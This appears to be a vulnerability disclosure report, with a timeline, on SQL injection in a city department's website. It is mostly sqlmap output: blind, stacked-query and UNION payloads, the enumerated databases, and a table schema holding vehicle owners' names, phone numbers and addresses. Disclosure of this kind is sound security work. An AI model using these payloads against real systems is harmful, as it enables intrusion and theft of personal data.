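2015-11-02: Details reported to the vendor; awaiting vendor handling
2015-11-02: Vendor confirmed; details disclosed to the vendor only
2015-11-12: Details disclosed to core white hats and experts in related fields
2015-11-22: Details disclosed to regular white hats
2015-12-02: Details disclosed to intern white hats
2015-12-17: Details disclosed to the public

SQL injection in a sensitive department of a certain city, exploitable via UNION (a million records exposed)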
http://**.**.**.**/wsyb/Input.aspx?id=9
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=9 AND 1466=1466

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: id=9;WAITFOR DELAY '0:0:5'--

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-9513 UNION ALL SELECT CHAR(113)+CHAR(112)+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(73)+CHAR(68)+CHAR(73)+CHAR(76)+CHAR(106)+CHAR(105)+CHAR(114)+CHAR(118)+CHAR(78)+CHAR(88)+CHAR(113)+CHAR(106)+CHAR(98)+CHAR(113)+CHAR(113),NULL,NULL--
---
[10:54:41] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2012
[10:54:41] [INFO] fetching database names
[10:54:41] [INFO] the SQL query used returns 9 entries
[10:54:41] [INFO] resumed: "CarMS"
[10:54:41] [INFO] resumed: "CMCC"
[10:54:41] [INFO] resumed: "dnt"
[10:54:41] [INFO] resumed: "master"
[10:54:41] [INFO] resumed: "model"
[10:54:41] [INFO] resumed: "msdb"
[10:54:41] [INFO] resumed: "search"
[10:54:41] [INFO] resumed: "tempdb"
[10:54:41] [INFO] resumed: "WSCGS"
available databases [9]:
[*] CarMS
[*] CMCC
[*] dnt
[*] master
[*] model
[*] msdb
[*] search
[*] tempdb
[*] WSCGS
Database: WSCGS
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| dbo.tbl_GZ_YSWD_JDC     | 375190  |
| dbo.tbl_GZ_YSWD_JDC     | 375190  |
| dbo.tbl_GZ_YSWD_JSZ     | 256892  |
| dbo.SMS_RECORD          | 55187   |
| dbo.WEIXIN_SUBSCRIBE    | 31360   |
| dbo.tbl_B_Mf_ry         | 11466   |
| dbo.tbl_JSZ             | 9269    |
| dbo.tbl_HPHM            | 6191    |
| dbo.DICTS               | 3557    |
| dbo.View_Send           | 2470    |
| dbo.Yk_Ksjh             | 1651    |
| dbo.Yk_Xyxx             | 1287    |
| dbo.solartermday        | 365     |
| dbo.YY_JJR              | 335     |
| dbo.LunisolarDatas      | 201     |
| dbo.tbl_Content         | 183     |
| dbo.Yk_School           | 46      |
| dbo.tbl_Placard         | 28      |
| dbo.LunisolarSolarTerm  | 24      |
| dbo.tbl_BusinessType    | 16      |
| dbo.tbl_Column          | 12      |
| dbo.tbl_B_Mf_xq         | 10      |
| dbo.tbl_BusinessDict    | 10      |
| dbo.tbl_BusinessYFDJ    | 9       |
| dbo.CHAT_RECORDDict     | 8       |
| dbo.CHAT_RECORDDict     | 8       |
| dbo.SMS_TESTSJHM        | 7       |
| dbo.tbl_Master          | 7       |
| dbo.tbl_JsFile          | 6       |
| dbo.tbl_UserGroup       | 4       |
| dbo.tbl_UserGroup       | 4       |
| dbo.tbl_Ip2             | 3       |
| dbo.tbl_Ip2             | 3       |
| dbo.tbl_MyFavorites     | 3       |
| dbo.tbl_Jkcx            | 2       |
| dbo.SMS_BLACKLIST       | 1       |
| dbo.tbl_ArticleTemplate | 1       |
| dbo.tbl_B_Mf_Jh         | 1       |
| dbo.tbl_FriendLink      | 1       |
| dbo.tbl_System          | 1       |
| dbo.tbl_Template        | 1       |
| dbo.Yk_Dcjl             | 1       |
| dbo.Yk_LS               | 1       |
+-------------------------+---------+

Database: WSCGS
Table: tbl_GZ_YSWD_JDC
[12 columns]
+--------+----------+
| Column | Type     |
+--------+----------+
| SJ     | datetime |
| 关联日期   | datetime |
| 号牌号码   | varchar  |
| 号牌种类   | varchar  |
| 告知编号   | varchar  |
| 序号     | varchar  |
| 所有人    | varchar  |
| 手机号码   | varchar  |
| 服务代码   | varchar  |
| 服务内容   | varchar  |
| 服务名称   | varchar  |
| 邮寄地址   | varchar  |
+--------+----------+
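All three tables contain personal data!!
Severity: High
Vulnerability Rank: 11
Confirmed: 2015-11-02 14:57
Thank you very much! The vulnerability you submitted has been verified and will be fixed as soon as possible.
None yet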